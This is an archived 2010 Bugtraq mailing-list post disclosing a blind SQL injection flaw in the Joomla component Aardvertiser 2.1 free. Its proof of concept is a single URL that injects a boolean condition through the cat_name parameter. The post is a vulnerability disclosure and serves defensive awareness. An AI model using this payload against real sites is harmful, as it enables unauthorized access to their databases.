Joomla Component Aardvertiser 2.1 free Blind SQL Injection Vulnerability

---

• From: sattler@xxxxxxxxxxxxx
• Date: Tue, 7 Sep 2010 10:48:40 -0600

---

# Exploit Title: Joomla Component Aardvertiser 2.1 free Blind SQL Injection Vulnerability
# Date: 07.09.2010
# Author: Stephan Sattler // www.solidmedia.de
# Software Link: http://sourceforge.net/projects/aardvertiser/files/com_aardvertiser%20V2.1.1%20Free/com_aardvertiserfree.zip/download
# Version: 2.1 free


[ Vulnerability//PoC ]

http://www.site.com/joomlapath/index.php?option=com_aardvertiser&cat_name=Vehicles'+AND+'1'='1&task=view

---

• Prev by Date: [SECURITY] [DSA 2098-2] New typo3-src packages fix regression
• Next by Date: [USN-984-1] LFTP vulnerability
• Previous by thread: [SECURITY] [DSA 2098-2] New typo3-src packages fix regression
• Next by thread: [USN-984-1] LFTP vulnerability
• Index(es):
  • Date
  • Thread

• Security
• UNIX
• Linux
• Coding
• Usenet

• News
• Mailing-Lists
• Newsgroups
• Service
• About
• Privacy
• Search
• Imprint

www.derkeiler.com  > Mailing-Lists  > securityfocus  > bugtraq  > 2010-09